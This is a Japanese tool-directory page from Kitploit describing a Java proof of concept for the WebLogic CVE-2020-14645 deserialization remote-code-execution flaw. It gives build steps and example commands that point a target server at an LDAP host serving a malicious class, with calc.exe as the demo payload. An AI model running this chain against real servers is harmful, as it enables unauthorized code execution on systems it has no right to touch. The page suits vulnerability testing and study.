Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/jlvsjp/weblogic_cve-2020-14645
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテストリモートアクセスツールペイロード開発
GitHubjlvsjp/weblogic_cve-2020-14645

Weblogic_CVE-2020-14645

WebLogic CVE-2020-14645 Coherence デシリアライゼーション RCE の Java PoC。LDAP 経由で悪意のあるクラスをホストし、脆弱な WebLogic サーバー上でリモートコード実行をトリガーします。

リポジトリを見る
166年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Weblogic CVE-2020-14645 coherence デシリアライズ脆弱性検証プログラム

環境

  • Maven 3

  • JDK 1.8

コンパイル

root@kitploit:~
mvn package

使用方法

具体的なテスト手順:

  1. POC を作成する
  2. POC を class ファイルにコンパイルする
  3. コンパイルした POC を公開するための静的サイトを起動する
  4. テスト対象が POC を取得するリクエストを転送するための LDAP プロキシを起動する
  5. テストプログラムを実行する

この脆弱性は Apache Dubbo の脆弱性と類似しているため、この脆弱性を参考にして 1-4 の手順を実装してください。

テストプログラムの実行

root@kitploit:~
java -jar target/CVE-2020-14645.jar LDAP_IP:LDAP_PORT/#CLASS_NAME WEBLOGIC_URL

# 例
java -jar target/CVE-2020-14645.jar 1.1.1.1:8080/#exp http://127.0.0.1:7001
java -jar target/CVE-2020-14645.jar 1.1.1.1:8080/#exp https://127.0.0.1:7002

本例で提供する POC を使用した場合、攻撃が成功するとテスト対象で calc.exe が実行されます。テスト対象の環境に応じて POC を適宜変更してください。

謝辞

本プロジェクトは @Y4er および @5up3rc のプロジェクトの一部コードを参考・引用しています。ここに感謝の意を表します。

参考資料

https://github.com/Y4er/CVE-2020-14645

https://github.com/5up3rc/weblogic_cmd

ツールをダウンロード